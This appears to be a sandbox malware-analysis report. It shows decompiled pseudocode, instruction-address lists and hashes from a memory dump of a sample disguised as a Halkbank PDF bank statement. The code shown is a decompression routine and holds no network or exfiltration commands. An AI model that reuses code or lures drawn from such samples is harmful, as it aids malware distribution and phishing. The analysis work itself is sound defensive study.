                                                                    													__edx =  *(__ebp - 8);
                                                                    													__cl =  *(__eax + __edx);
                                                                    													__eax =  *(__ebp - 0x14);
                                                                    													 *(__ebp - 0x5c) = __cl;
                                                                    													 *(__eax + __edx) = __cl;
                                                                    													__eax = __eax + 1;
                                                                    													__edx = 0;
                                                                    													_t414 = __eax %  *(__ebp - 0x74);
                                                                    													__eax = __eax /  *(__ebp - 0x74);
                                                                    													__edx = _t414;
                                                                    													__eax =  *(__ebp - 0x68);
                                                                    													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                    													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                    													__eflags =  *(__ebp - 0x30);
                                                                    													 *( *(__ebp - 0x68)) = __cl;
                                                                    													 *(__ebp - 0x14) = _t414;
                                                                    													if( *(__ebp - 0x30) > 0) {
                                                                    														continue;
                                                                    													} else {
                                                                    														L80:
                                                                    														 *(__ebp - 0x88) = 2;
                                                                    														goto L1;
                                                                    													}
                                                                    												}
                                                                    												 *(__ebp - 0x88) = 0x1c;
                                                                    												goto L170;
                                                                    										}
                                                                    									}
                                                                    									L171:
                                                                    									_t544 = _t543 | 0xffffffff;
                                                                    									goto L172;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					goto L1;
                                                                    				}
                                                                    			}














                                                                    0x00000000
                                                                    0x00406ffe
                                                                    0x00406ffe
                                                                    0x00407002
                                                                    0x00407023
                                                                    0x0040702a
                                                                    0x00407030
                                                                    0x00407036
                                                                    0x00407048
                                                                    0x0040704e
                                                                    0x00407053
                                                                    0x00000000
                                                                    0x00407004
                                                                    0x0040700a
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x004073ce
                                                                    0x004073ce
                                                                    0x004073ce
                                                                    0x004073d4
                                                                    0x004073da
                                                                    0x004073e0
                                                                    0x004073fa
                                                                    0x004073fd
                                                                    0x00407403
                                                                    0x0040740e
                                                                    0x00407410
                                                                    0x004073e2
                                                                    0x004073e2
                                                                    0x004073f1
                                                                    0x004073f5
                                                                    0x004073f5
                                                                    0x0040741a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040741c
                                                                    0x00407420
                                                                    0x004075cf
                                                                    0x004075e5
                                                                    0x004075ed
                                                                    0x004075f4
                                                                    0x004075f6
                                                                    0x004075fd
                                                                    0x00407601
                                                                    0x00407601
                                                                    0x0040742c
                                                                    0x00407433
                                                                    0x0040743b
                                                                    0x0040743e
                                                                    0x00407441
                                                                    0x00407441
                                                                    0x00407447
                                                                    0x00407447
                                                                    0x00406be3
                                                                    0x00406be3
                                                                    0x00406be3
                                                                    0x00406bec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bf2
                                                                    0x00000000
                                                                    0x00406bfd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c06
                                                                    0x00406c09
                                                                    0x00406c0c
                                                                    0x00406c10
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c16
                                                                    0x00406c19
                                                                    0x00406c1b
                                                                    0x00406c1c
                                                                    0x00406c1f
                                                                    0x00406c21
                                                                    0x00406c22
                                                                    0x00406c24
                                                                    0x00406c27
                                                                    0x00406c2c
                                                                    0x00406c31
                                                                    0x00406c3a
                                                                    0x00406c4d
                                                                    0x00406c50
                                                                    0x00406c5c
                                                                    0x00406c84
                                                                    0x00406c86
                                                                    0x00406c94
                                                                    0x00406c94
                                                                    0x00406c98
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c88
                                                                    0x00406c88
                                                                    0x00406c8b
                                                                    0x00406c8c
                                                                    0x00406c8c
                                                                    0x00000000
                                                                    0x00406c88
                                                                    0x00406c62
                                                                    0x00406c67
                                                                    0x00406c67
                                                                    0x00406c70
                                                                    0x00406c78
                                                                    0x00406c7b
                                                                    0x00000000
                                                                    0x00406c81
                                                                    0x00406c81
                                                                    0x00000000
                                                                    0x00406c81
                                                                    0x00000000
                                                                    0x00406c9e
                                                                    0x00406c9e
                                                                    0x00406ca2
                                                                    0x0040754e
                                                                    0x00000000
                                                                    0x0040754e
                                                                    0x00406cab
                                                                    0x00406cbb
                                                                    0x00406cbe
                                                                    0x00406cc1
                                                                    0x00406cc1
                                                                    0x00406cc1
                                                                    0x00406cc4
                                                                    0x00406cc8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406cca
                                                                    0x00406cd0
                                                                    0x00406cfa
                                                                    0x00406d00
                                                                    0x00406d07
                                                                    0x00000000
                                                                    0x00406d07
                                                                    0x00406cd6
                                                                    0x00406cd9
                                                                    0x00406cde
                                                                    0x00406cde
                                                                    0x00406ce9
                                                                    0x00406cf1
                                                                    0x00406cf4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d39
                                                                    0x00406d3f
                                                                    0x00406d42
                                                                    0x00406d4f
                                                                    0x00406d57
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d0e
                                                                    0x00406d0e
                                                                    0x00406d12
                                                                    0x0040755d
                                                                    0x00000000
                                                                    0x0040755d
                                                                    0x00406d1e
                                                                    0x00406d29
                                                                    0x00406d29
                                                                    0x00406d29
                                                                    0x00406d2c
                                                                    0x00406d2f
                                                                    0x00406d32
                                                                    0x00406d37
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004073ce
                                                                    0x004073ce
                                                                    0x004073d4
                                                                    0x004073da
                                                                    0x004073e0
                                                                    0x004073fa
                                                                    0x004073fd
                                                                    0x00407403
                                                                    0x0040740e
                                                                    0x00407410
                                                                    0x004073e2
                                                                    0x004073e2
                                                                    0x004073f1
                                                                    0x004073f5
                                                                    0x004073f5
                                                                    0x0040741a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d5f
                                                                    0x00406d61
                                                                    0x00406d64
                                                                    0x00406dd5
                                                                    0x00406dd8
                                                                    0x00406ddb
                                                                    0x00406de2
                                                                    0x00406dec
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x00000000
                                                                    0x004073cb
                                                                    0x00406d66
                                                                    0x00406d6a
                                                                    0x00406d6d
                                                                    0x00406d6f
                                                                    0x00406d72
                                                                    0x00406d75
                                                                    0x00406d77
                                                                    0x00406d7a
                                                                    0x00406d7c
                                                                    0x00406d81
                                                                    0x00406d84
                                                                    0x00406d87
                                                                    0x00406d8b
                                                                    0x00406d92
                                                                    0x00406d95
                                                                    0x00406d9c
                                                                    0x00406da0
                                                                    0x00406da8
                                                                    0x00406da8
                                                                    0x00406da8
                                                                    0x00406da2
                                                                    0x00406da2
                                                                    0x00406da2
                                                                    0x00406d97
                                                                    0x00406d97
                                                                    0x00406d97
                                                                    0x00406dac
                                                                    0x00406daf
                                                                    0x00406dcd
                                                                    0x00406dcf
                                                                    0x00000000
                                                                    0x00406db1
                                                                    0x00406db1
                                                                    0x00406db4
                                                                    0x00406db7
                                                                    0x00406dba
                                                                    0x00406dbc
                                                                    0x00406dbc
                                                                    0x00406dbc
                                                                    0x00406dbf
                                                                    0x00406dc2
                                                                    0x00406dc4
                                                                    0x00406dc5
                                                                    0x00406dc8
                                                                    0x00000000
                                                                    0x00406dc8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407068
                                                                    0x0040706c
                                                                    0x0040708f
                                                                    0x00407092
                                                                    0x00407095
                                                                    0x0040709f
                                                                    0x0040706e
                                                                    0x0040706e
                                                                    0x00407071
                                                                    0x00407074
                                                                    0x00407077
                                                                    0x00407084
                                                                    0x00407087
                                                                    0x00407087
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x00000000
                                                                    0x004073cb
                                                                    0x00000000
                                                                    0x004070ab
                                                                    0x004070af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070b5
                                                                    0x004070b9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070bf
                                                                    0x004070c1
                                                                    0x004070c5
                                                                    0x004070c5
                                                                    0x004070c8
                                                                    0x004070cc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040711c
                                                                    0x00407120
                                                                    0x00407127
                                                                    0x0040712a
                                                                    0x0040712d
                                                                    0x00407137
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x00000000
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x00407122
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407143
                                                                    0x00407147
                                                                    0x0040714e
                                                                    0x00407151
                                                                    0x00407154
                                                                    0x00407149
                                                                    0x00407149
                                                                    0x00407149
                                                                    0x00407157
                                                                    0x0040715a
                                                                    0x0040715d
                                                                    0x0040715d
                                                                    0x00407160
                                                                    0x00407163
                                                                    0x00407166
                                                                    0x00407166
                                                                    0x00407169
                                                                    0x00407170
                                                                    0x00407175
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407203
                                                                    0x00407203
                                                                    0x00407207
                                                                    0x004075a5
                                                                    0x00000000
                                                                    0x004075a5
                                                                    0x0040720d
                                                                    0x00407210
                                                                    0x00407213
                                                                    0x00407217
                                                                    0x0040721a
                                                                    0x00407220
                                                                    0x00407222
                                                                    0x00407222
                                                                    0x00407222
                                                                    0x00407225
                                                                    0x00407228
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406df8
                                                                    0x00406df8
                                                                    0x00406dfc
                                                                    0x00407569
                                                                    0x00000000
                                                                    0x00407569
                                                                    0x00406e02
                                                                    0x00406e05
                                                                    0x00406e08
                                                                    0x00406e0c
                                                                    0x00406e0f
                                                                    0x00406e15
                                                                    0x00406e17
                                                                    0x00406e17
                                                                    0x00406e17
                                                                    0x00406e1a
                                                                    0x00406e1d
                                                                    0x00406e1d
                                                                    0x00406e20
                                                                    0x00406e23
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406e29
                                                                    0x00406e2f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406e35
                                                                    0x00406e35
                                                                    0x00406e39
                                                                    0x00406e3c
                                                                    0x00406e3f
                                                                    0x00406e42
                                                                    0x00406e45
                                                                    0x00406e46
                                                                    0x00406e49
                                                                    0x00406e4b
                                                                    0x00406e51
                                                                    0x00406e54
                                                                    0x00406e57
                                                                    0x00406e5a
                                                                    0x00406e5d
                                                                    0x00406e60
                                                                    0x00406e63
                                                                    0x00406e7f
                                                                    0x00406e82
                                                                    0x00406e85
                                                                    0x00406e88
                                                                    0x00406e8f
                                                                    0x00406e93
                                                                    0x00406e95
                                                                    0x00406e99
                                                                    0x00406e65
                                                                    0x00406e65
                                                                    0x00406e69
                                                                    0x00406e71
                                                                    0x00406e76
                                                                    0x00406e78
                                                                    0x00406e7a
                                                                    0x00406e7a
                                                                    0x00406e9c
                                                                    0x00406ea3
                                                                    0x00406ea6
                                                                    0x00000000
                                                                    0x00406eac
                                                                    0x00000000
                                                                    0x00406eac
                                                                    0x00000000
                                                                    0x00406eb1
                                                                    0x00406eb1
                                                                    0x00406eb5
                                                                    0x00407575
                                                                    0x00000000
                                                                    0x00407575
                                                                    0x00406ebb
                                                                    0x00406ebe
                                                                    0x00406ec1
                                                                    0x00406ec5
                                                                    0x00406ec8
                                                                    0x00406ece
                                                                    0x00406ed0
                                                                    0x00406ed0
                                                                    0x00406ed0
                                                                    0x00406ed3
                                                                    0x00406ed6
                                                                    0x00406ed6
                                                                    0x00406ed6
                                                                    0x00406edc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ede
                                                                    0x00406ee1
                                                                    0x00406ee4
                                                                    0x00406ee7
                                                                    0x00406eea
                                                                    0x00406eed
                                                                    0x00406ef0
                                                                    0x00406ef3
                                                                    0x00406ef6
                                                                    0x00406ef9
                                                                    0x00406efc
                                                                    0x00406f14
                                                                    0x00406f17
                                                                    0x00406f1a
                                                                    0x00406f1d
                                                                    0x00406f1d
                                                                    0x00406f20
                                                                    0x00406f24
                                                                    0x00406f26
                                                                    0x00406efe
                                                                    0x00406efe
                                                                    0x00406f06
                                                                    0x00406f0b
                                                                    0x00406f0d
                                                                    0x00406f0f
                                                                    0x00406f0f
                                                                    0x00406f29
                                                                    0x00406f30
                                                                    0x00406f33
                                                                    0x00000000
                                                                    0x00406f35
                                                                    0x00000000
                                                                    0x00406f35
                                                                    0x00406f33
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f75
                                                                    0x00406f75
                                                                    0x00406f79
                                                                    0x00407581
                                                                    0x00000000
                                                                    0x00407581
                                                                    0x00406f7f
                                                                    0x00406f82
                                                                    0x00406f85
                                                                    0x00406f89
                                                                    0x00406f8c
                                                                    0x00406f92
                                                                    0x00406f94
                                                                    0x00406f94
                                                                    0x00406f94
                                                                    0x00406f97
                                                                    0x00406f9a
                                                                    0x00406f9a
                                                                    0x00406fa0
                                                                    0x00406f3e
                                                                    0x00406f3e
                                                                    0x00406f41
                                                                    0x00000000
                                                                    0x00406f41
                                                                    0x00406fa2
                                                                    0x00406fa2
                                                                    0x00406fa5
                                                                    0x00406fa8
                                                                    0x00406fab
                                                                    0x00406fae
                                                                    0x00406fb1
                                                                    0x00406fb4
                                                                    0x00406fb7
                                                                    0x00406fba
                                                                    0x00406fbd
                                                                    0x00406fc0
                                                                    0x00406fd8
                                                                    0x00406fdb
                                                                    0x00406fde
                                                                    0x00406fe1
                                                                    0x00406fe1
                                                                    0x00406fe4
                                                                    0x00406fe8
                                                                    0x00406fea
                                                                    0x00406fc2
                                                                    0x00406fc2
                                                                    0x00406fca
                                                                    0x00406fcf
                                                                    0x00406fd1
                                                                    0x00406fd3
                                                                    0x00406fd3
                                                                    0x00406fed
                                                                    0x00406ff4
                                                                    0x00406ff7
                                                                    0x00000000
                                                                    0x00406ff9
                                                                    0x00000000
                                                                    0x00406ff9
                                                                    0x00000000
                                                                    0x00407286
                                                                    0x00407286
                                                                    0x0040728a
                                                                    0x004075b1
                                                                    0x00000000
                                                                    0x004075b1
                                                                    0x00407290
                                                                    0x00407293
                                                                    0x00407296
                                                                    0x0040729a
                                                                    0x0040729d
                                                                    0x004072a3
                                                                    0x004072a5
                                                                    0x004072a5
                                                                    0x004072a5
                                                                    0x004072a8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407056
                                                                    0x00407056
                                                                    0x00407059
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x00000000
                                                                    0x004073cb
                                                                    0x00000000
                                                                    0x00407395
                                                                    0x00407399
                                                                    0x004073bb
                                                                    0x004073be
                                                                    0x004073c8
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x00000000
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x0040739b
                                                                    0x0040739e
                                                                    0x004073a2
                                                                    0x004073a5
                                                                    0x004073a5
                                                                    0x004073a8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407452
                                                                    0x00407456
                                                                    0x00407474
                                                                    0x00407474
                                                                    0x00407474
                                                                    0x0040747b
                                                                    0x00407482
                                                                    0x00407489
                                                                    0x00407489
                                                                    0x00000000
                                                                    0x00407489
                                                                    0x00407458
                                                                    0x0040745b
                                                                    0x0040745e
                                                                    0x00407461
                                                                    0x00407468
                                                                    0x004073ac
                                                                    0x004073ac
                                                                    0x004073af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407543
                                                                    0x00407546
                                                                    0x00407447
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040717d
                                                                    0x0040717f
                                                                    0x00407186
                                                                    0x00407187
                                                                    0x00407189
                                                                    0x0040718c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407194
                                                                    0x00407197
                                                                    0x0040719a
                                                                    0x0040719c
                                                                    0x0040719e
                                                                    0x0040719e
                                                                    0x0040719f
                                                                    0x004071a2
                                                                    0x004071a9
                                                                    0x004071ac
                                                                    0x004071ba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407490
                                                                    0x00407490
                                                                    0x00407493
                                                                    0x0040749a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040749f
                                                                    0x0040749f
                                                                    0x004074a3
                                                                    0x004075db
                                                                    0x00000000
                                                                    0x004075db
                                                                    0x004074a9
                                                                    0x004074ac
                                                                    0x004074af
                                                                    0x004074b3
                                                                    0x004074b6
                                                                    0x004074bc
                                                                    0x004074be
                                                                    0x004074be
                                                                    0x004074be
                                                                    0x004074c1
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c7
                                                                    0x004074c7
                                                                    0x004074cb
                                                                    0x0040752b
                                                                    0x0040752e
                                                                    0x00407533
                                                                    0x00407534
                                                                    0x00407536
                                                                    0x00407538
                                                                    0x0040753b
                                                                    0x00407447
                                                                    0x00407447
                                                                    0x00000000
                                                                    0x0040744d
                                                                    0x00407447
                                                                    0x004074cd
                                                                    0x004074d3
                                                                    0x004074d6
                                                                    0x004074d9
                                                                    0x004074dc
                                                                    0x004074df
                                                                    0x004074e2
                                                                    0x004074e5
                                                                    0x004074e8
                                                                    0x004074eb
                                                                    0x004074ee
                                                                    0x00407507
                                                                    0x0040750a
                                                                    0x0040750d
                                                                    0x00407510
                                                                    0x00407514
                                                                    0x00407516
                                                                    0x00407516
                                                                    0x00407517
                                                                    0x0040751a
                                                                    0x004074f0
                                                                    0x004074f0
                                                                    0x004074f8
                                                                    0x004074fd
                                                                    0x004074ff
                                                                    0x00407502
                                                                    0x00407502
                                                                    0x0040751d
                                                                    0x00407524
                                                                    0x00000000
                                                                    0x00407526
                                                                    0x00000000
                                                                    0x00407526
                                                                    0x00000000
                                                                    0x004071c2
                                                                    0x004071c5
                                                                    0x004071fb
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732e
                                                                    0x0040732e
                                                                    0x00407331
                                                                    0x00407333
                                                                    0x004075bd
                                                                    0x00000000
                                                                    0x004075bd
                                                                    0x00407339
                                                                    0x0040733c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407342
                                                                    0x00407346
                                                                    0x00407349
                                                                    0x00407349
                                                                    0x00407349
                                                                    0x00000000
                                                                    0x00407349
                                                                    0x004071c7
                                                                    0x004071c9
                                                                    0x004071cb
                                                                    0x004071cd
                                                                    0x004071d0
                                                                    0x004071d1
                                                                    0x004071d3
                                                                    0x004071d5
                                                                    0x004071d8
                                                                    0x004071db
                                                                    0x004071f1
                                                                    0x004071f6
                                                                    0x0040722e
                                                                    0x0040722e
                                                                    0x00407232
                                                                    0x0040725e
                                                                    0x00407260
                                                                    0x00407267
                                                                    0x0040726a
                                                                    0x0040726d
                                                                    0x0040726d
                                                                    0x00407272
                                                                    0x00407272
                                                                    0x00407274
                                                                    0x00407277
                                                                    0x0040727e
                                                                    0x00407281
                                                                    0x004072ae
                                                                    0x004072ae
                                                                    0x004072b1
                                                                    0x004072b4
                                                                    0x00407328
                                                                    0x00407328
                                                                    0x00407328
                                                                    0x00000000
                                                                    0x00407328
                                                                    0x004072b6
                                                                    0x004072bc
                                                                    0x004072bf
                                                                    0x004072c2
                                                                    0x004072c5
                                                                    0x004072c8
                                                                    0x004072cb
                                                                    0x004072ce
                                                                    0x004072d1
                                                                    0x004072d4
                                                                    0x004072d7
                                                                    0x004072f0
                                                                    0x004072f2
                                                                    0x004072f5
                                                                    0x004072f6
                                                                    0x004072f9
                                                                    0x004072fb
                                                                    0x004072fe
                                                                    0x00407300
                                                                    0x00407302
                                                                    0x00407305
                                                                    0x00407307
                                                                    0x0040730a
                                                                    0x0040730e
                                                                    0x00407310
                                                                    0x00407310
                                                                    0x00407311
                                                                    0x00407314
                                                                    0x00407317
                                                                    0x004072d9
                                                                    0x004072d9
                                                                    0x004072e1
                                                                    0x004072e6
                                                                    0x004072e8
                                                                    0x004072eb
                                                                    0x004072eb
                                                                    0x0040731a
                                                                    0x00407321
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00407321
                                                                    0x00407234
                                                                    0x00407237
                                                                    0x00407239
                                                                    0x0040723c
                                                                    0x0040723f
                                                                    0x00407242
                                                                    0x00407244
                                                                    0x00407247
                                                                    0x0040724a
                                                                    0x0040724a
                                                                    0x0040724d
                                                                    0x0040724d
                                                                    0x00407250
                                                                    0x00407257
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00407257
                                                                    0x004071dd
                                                                    0x004071e0
                                                                    0x004071e2
                                                                    0x004071e5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f44
                                                                    0x00406f44
                                                                    0x00406f48
                                                                    0x0040758d
                                                                    0x00000000
                                                                    0x0040758d
                                                                    0x00406f4e
                                                                    0x00406f51
                                                                    0x00406f54
                                                                    0x00406f57
                                                                    0x00406f5a
                                                                    0x00406f5d
                                                                    0x00406f60
                                                                    0x00406f62
                                                                    0x00406f65
                                                                    0x00406f68
                                                                    0x00406f6b
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070cf
                                                                    0x004070cf
                                                                    0x004070d3
                                                                    0x00407599
                                                                    0x00000000
                                                                    0x00407599
                                                                    0x004070d9
                                                                    0x004070dc
                                                                    0x004070df
                                                                    0x004070e2
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e7
                                                                    0x004070ea
                                                                    0x004070ed
                                                                    0x004070f0
                                                                    0x004070f3
                                                                    0x004070f6
                                                                    0x004070f7
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070fc
                                                                    0x004070ff
                                                                    0x00407102
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407108
                                                                    0x0040710a
                                                                    0x0040710a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x00407350
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407356
                                                                    0x00407359
                                                                    0x0040735c
                                                                    0x0040735f
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407364
                                                                    0x00407367
                                                                    0x0040736a
                                                                    0x0040736d
                                                                    0x00407370
                                                                    0x00407373
                                                                    0x00407374
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407379
                                                                    0x0040737c
                                                                    0x0040737f
                                                                    0x00407382
                                                                    0x00407385
                                                                    0x00407389
                                                                    0x0040738b
                                                                    0x0040738e
                                                                    0x00000000
                                                                    0x00407390
                                                                    0x0040710d
                                                                    0x0040710d
                                                                    0x00000000
                                                                    0x0040710d
                                                                    0x0040738e
                                                                    0x004075c3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bf2
                                                                    0x004075fa
                                                                    0x004075fa
                                                                    0x00000000
                                                                    0x004075fa
                                                                    0x00407447
                                                                    0x004073ce
                                                                    0x004073cb
                                                                    0x00000000
                                                                    0x00407002

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                    • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                    • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                    • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 98%
                                                                    			E0040711C() {
                                                                    				unsigned short _t531;
                                                                    				signed int _t532;
                                                                    				void _t533;
                                                                    				signed int _t534;
                                                                    				signed int _t535;
                                                                    				signed int _t565;
                                                                    				signed int _t568;
                                                                    				signed int _t589;
                                                                    				signed int* _t606;
                                                                    				void* _t613;
                                                                    
                                                                    				L0:
                                                                    				while(1) {
                                                                    					L0:
                                                                    					if( *(_t613 - 0x40) != 0) {
                                                                    						 *(_t613 - 0x84) = 0xb;
                                                                    						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                    						goto L132;
                                                                    					} else {
                                                                    						__eax =  *(__ebp - 0x28);
                                                                    						L88:
                                                                    						 *(__ebp - 0x2c) = __eax;
                                                                    						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                    						L89:
                                                                    						__eax =  *(__ebp - 4);
                                                                    						 *(__ebp - 0x80) = 0x15;
                                                                    						__eax =  *(__ebp - 4) + 0xa68;
                                                                    						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                    						L69:
                                                                    						 *(__ebp - 0x84) = 0x12;
                                                                    						while(1) {
                                                                    							L132:
                                                                    							 *(_t613 - 0x54) = _t606;
                                                                    							while(1) {
                                                                    								L133:
                                                                    								_t531 =  *_t606;
                                                                    								_t589 = _t531 & 0x0000ffff;
                                                                    								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                    								if( *(_t613 - 0xc) >= _t565) {
                                                                    									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                    									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                    									 *(_t613 - 0x40) = 1;
                                                                    									_t532 = _t531 - (_t531 >> 5);
                                                                    									 *_t606 = _t532;
                                                                    								} else {
                                                                    									 *(_t613 - 0x10) = _t565;
                                                                    									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                    									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                    								}
                                                                    								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                    									goto L139;
                                                                    								}
                                                                    								L137:
                                                                    								if( *(_t613 - 0x6c) == 0) {
                                                                    									 *(_t613 - 0x88) = 5;
                                                                    									L170:
                                                                    									_t568 = 0x22;
                                                                    									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                    									_t535 = 0;
                                                                    									L172:
                                                                    									return _t535;
                                                                    								}
                                                                    								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                    								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                    								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                    								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                    								L139:
                                                                    								_t533 =  *(_t613 - 0x84);
                                                                    								while(1) {
                                                                    									 *(_t613 - 0x88) = _t533;
                                                                    									while(1) {
                                                                    										L1:
                                                                    										_t534 =  *(_t613 - 0x88);
                                                                    										if(_t534 > 0x1c) {
                                                                    											break;
                                                                    										}
                                                                    										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                    											case 0:
                                                                    												if( *(_t613 - 0x6c) == 0) {
                                                                    													goto L170;
                                                                    												}
                                                                    												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                    												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                    												_t534 =  *( *(_t613 - 0x70));
                                                                    												if(_t534 > 0xe1) {
                                                                    													goto L171;
                                                                    												}
                                                                    												_t538 = _t534 & 0x000000ff;
                                                                    												_push(0x2d);
                                                                    												asm("cdq");
                                                                    												_pop(_t570);
                                                                    												_push(9);
                                                                    												_pop(_t571);
                                                                    												_t609 = _t538 / _t570;
                                                                    												_t540 = _t538 % _t570 & 0x000000ff;
                                                                    												asm("cdq");
                                                                    												_t604 = _t540 % _t571 & 0x000000ff;
                                                                    												 *(_t613 - 0x3c) = _t604;
                                                                    												 *(_t613 - 0x1c) = (1 << _t609) - 1;
